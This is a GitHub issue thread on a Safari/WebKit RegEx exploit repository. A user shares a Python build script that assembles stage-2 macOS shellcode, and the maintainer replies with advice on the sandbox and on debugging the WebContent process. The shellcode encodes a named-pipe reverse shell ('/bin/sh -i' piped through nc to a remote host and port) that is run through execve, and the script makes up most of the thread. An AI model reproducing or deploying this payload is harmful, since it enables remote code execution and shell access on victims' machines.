LinusHenze / WebKit-RegEx-Exploit


Questions about the shellcode #3

Closed thinkycx closed 5 years ago

thinkycx commented 5 years ago

Hello, I have some questions about it. When I change the shellcode (such as running a command using the execve syscall) in stage2 and run make.py, Safari does not work well.

So, how do I change the shellcode to run a command? When I use lldb to attach to Safari and debug it, I write `int 3` in the shellcode, but lldb does not stop at 0xcc. If I use lldb to attach to it, where should I set breakpoints to test the shellcode?

Looking forward to your reply. Thank you.

make.py

```python
#!/usr/bin/env python

import subprocess
from string import Template

str_to_print = "Hello world from Assembly!\n"

# Generate payload
template = """
.intel_syntax noprefix
.text

.macro putchar chr
    lea rax, [rip+3f]
    mov qword ptr [rip+reentry_function], rax
    movabs rax, 0xFFFF000000000000+\chr
    ret
3:
.endmacro

.globl start
start:
    $buf
    cmp qword ptr [rip+reentry_function], 0
    je 3f
    mov rax, qword ptr [rip+reentry_function]
    jmp rax
3:
    $payload
    // Return value
    movabs rax, 0xFFFF000000000000

    ret

.data

.globl reentry_function
reentry_function:
    .quad 0
"""

payload = ""
for c in str_to_print:
    payload += "putchar %d\n"%(ord(c))

buf = '''
    xor     rax, rax
    mov     rax,0x2
    ror     rax, 0x28
    or      rax, 59
    mov rcx, rax

    xor     rdx, rdx
    mov     rbx, 0x68732f2f6e69622f
    push    rdx
    push    rbx
    push    rsp
    pop     rdi

    push    rdx
    mov     rbx, 0x632d
    push    rdx
    push    rbx
    push    rsp
    pop     rbx

    push    rdx

; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 7777 > /tmp/f
; nc -lv 0.0.0.0 7777
    mov rcx, 0x66
    push rcx
    mov rcx, 0x2f706d742f203e20
    push rcx
    mov rcx, 0x3737373720363032
    push rcx
    mov rcx, 0x2e34342e3031322e
    push rcx
    mov rcx, 0x303120636e7c3126
    push rcx
    mov rcx, 0x3e3220692d206873
    push rcx
    mov rcx, 0x2f6e69622f7c662f
    push rcx
    mov rcx, 0x706d742f20746163
    push rcx
    mov rcx, 0x3b662f706d742f20
    push rcx
    mov rcx, 0x6f6669666b6d3b66
    push rcx
    mov rcx, 0x2f706d742f206d72
    push rcx

    push rsp
    pop rcx

    push    rdx
    push    rcx
    push    rbx
    push    rdi
    push    rsp
    pop     rsi

    syscall
'''

payload = Template(template).substitute(payload=payload, buf=buf)
# payload = Template(template).substitute(payload=payload)

# Write payload
f = open("stage2_macOS.S", "w+")
f.write(payload)
f.close()

# Build payload
subprocess.check_call(['clang', '-nostdlib', '-static', 'stage2_macOS.S', '-o', 'stage2_macOS.o'])
subprocess.check_call(['gobjcopy', '-O', 'binary', 'stage2_macOS.o', 'stage2_macOS.bin'])

# Delete the generated source and binary
subprocess.check_call(['rm', 'stage2_macOS.S'])
subprocess.check_call(['rm', 'stage2_macOS.o'])
```

LinusHenze commented 5 years ago

Your shellcode won't work because Safari is sandboxed; you first need a sandbox escape to run shell commands. The reason you get the crash is that the syscall fails and you're not returning a valid value from your shellcode. If you want to debug using lldb, you need to attach to WebContent, not Safari. WebContent is the process that runs JavaScript and displays the website. Note that there will be one WebContent process for each open tab.

thinkycx commented 5 years ago

Thank you very much. @LinusHenze